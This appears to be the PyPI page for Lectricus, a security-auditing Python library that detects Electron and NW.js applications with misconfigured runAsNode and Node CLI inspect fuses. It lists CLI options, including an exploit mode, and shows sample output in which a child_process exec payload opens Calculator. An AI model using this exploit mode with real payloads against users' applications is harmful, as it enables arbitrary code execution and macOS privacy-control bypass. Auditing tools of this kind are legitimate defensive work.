Project description

Project Lectricus

Python-based library for programmatically detecting potentially misconfigured Electron applications, specifically the runAsNode and enableNodeCliInspectArguments fuses allowing arbitrary code execution within the context of the application.

First unveiled at MacDevOpsYVR 2024: Electron Security: Making your Mac a worse place?

This project is primarily designed for auditing purposes, starting as a side project after learning about @tsunek0h's CVE-2023-32546 and later on extending the initial work of Wojciech Reguła's electroniz3r:

Programmatic fuse configuration detection
Multi-platform support (macOS, Windows, Linux)
Exporting of vulnerable applications to various formats (XML, JSON, CSV, etc.)
Developed as a library, for easy integration into other projects
Targets both Electron and NW.js applications
Simple macOS GUI for non-technical users

Since the initial conception of Lectricus in late 2023, Electron has released a statement on Electron's runAsNode fuse: Statement regarding "runAsNode" CVEs

Do keep in mind that Electron does not discuss the TCC bypasses that the misconfigured Electron fuses cause.

Installation

For standalone executables, see GitHub Releases.

For Python-based installation of the Python library, Lectricus is available on PyPI:

$ python3 -m pip install lectricus

Usage - GUI

Simply run Lectricus (GUI).app on macOS, and select List vulnerable electron applications to get a list of vulnerable applications.

First window	List applications

Usage - Command Line

List Vulnerable Applications

$ lectricus --list-vulnerable-apps

>>> Found 4 vulnerable applications 😱
>>> Correctly Configured Electron Fuses:
>>>   - /Applications/1Password.app
>>>   - /Applications/Keeper Password Manager.app
>>>   - /Applications/Slack.app
>>> Lacking Electron Fuse Support:
>>>   - /Applications/Advanced Privacy.app
>>>     - Vulnerabilities:
>>>       - RUN_AS_NODE
>>>       - ENABLE_NODE_CLI_INSPECT_ARGUMENTS
>>> Misconfigured Electron Fuses:
>>>   - /Applications/Tap Trustee.app
>>>     - Vulnerabilities:
>>>       - RUN_AS_NODE
>>>       - ENABLE_NODE_CLI_INSPECT_ARGUMENTS
>>>   - /Applications/Affected Makeup.app
>>>     - Vulnerabilities:
>>>       - ENABLE_NODE_CLI_INSPECT_ARGUMENTS
>>>   - /Applications/Struck Cap.app
>>>     - Vulnerabilities:
>>>       - RUN_AS_NODE
>>>       - ENABLE_NODE_CLI_INSPECT_ARGUMENTS

Attempt Arbitrary Code Execution

$ lectricus.py --exploit-application "/Applications/Advanced Privacy.app"

>>> Selected exploit method: run_as_node
>>> Determined entry point: /Applications/Advanced Privacy.app/Contents/MacOS/Advanced Privacy
>>> Running exploit on /Applications/Advanced Privacy.app/Contents/MacOS/Advanced Privacy
>>> JavaScript payload: const { exec } = require("child_process"); exec("/usr/bin/open -a Calculator");

Command Line Parameters

Detect and exploit misconfigured Electron applications

options:
  -h, --help            show this help message and exit
  --list-vulnerable-apps, -l
                        List vulnerable applications
  --export, -e          Export vulnerable applications, if '--export-location' is not specified, export to STDOUT
  --format FORMAT, -f FORMAT
                        Export format (xml, plist, json, csv)
  --export-location EXPORT_LOCATION, -o EXPORT_LOCATION
                        Export location
  --app-directory APP_DIRECTORY, -d APP_DIRECTORY
                        Application directory to search. Can provide .app directly
  --sys-platform SYS_PLATFORM, -p SYS_PLATFORM
                        Override sys.platform value used for application search. Useful for cross-platform exploitation on external
                        drives.
  --exploit-application EXPLOIT_APPLICATION, -x EXPLOIT_APPLICATION
                        Application to exploit.
  --exploit-method EXPLOIT_METHOD, -m EXPLOIT_METHOD
                        Exploit method to use.
  --javascript-payload JAVASCRIPT_PAYLOAD, -j JAVASCRIPT_PAYLOAD
                        JavaScript payload to execute. If not specified, open
                        Calculator on macOS.
  --javascript-payload-file JAVASCRIPT_PAYLOAD_FILE, -J JAVASCRIPT_PAYLOAD_FILE
                        JavaScript payload file to execute. Alternative to '--
                        javascript-payload'.

Project details

These details have not been verified by PyPI

Project links

Homepage

Development Status
- 5 - Production/Stable
License
- OSI Approved :: BSD License
Operating System
Programming Language
- Python :: 3

Release history Release notifications | RSS feed

1.0.1

Jul 2, 2024

This version

1.0.0

Jun 21, 2024

0.0.1

Jun 21, 2024

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distributions

No source distribution files available for this release.See tutorial on generating distribution archives.

Built Distribution

lectricus-1.0.0-py3-none-any.whl (13.6 kB view details)

Uploaded Jun 21, 2024 Python 3

File details

Details for the file lectricus-1.0.0-py3-none-any.whl.

File metadata

Download URL: lectricus-1.0.0-py3-none-any.whl
Upload date: Jun 21, 2024
Size: 13.6 kB
Tags: Python 3
Uploaded using Trusted Publishing? No
Uploaded via: twine/5.1.0 CPython/3.11.9

File hashes

Hashes for lectricus-1.0.0-py3-none-any.whl
Algorithm	Hash digest
SHA256	`92f1cf90d298440935223e5d1591ec86c4b9046a6048cbe86baba81992d7ab03`
MD5	`2bc9e275d88ac376c74ba4b02bd52cb2`
BLAKE2b-256	`ef80240dd3c82bae4a39b6ce53039ffeadffc6569bb44721be7a649f8d73638c`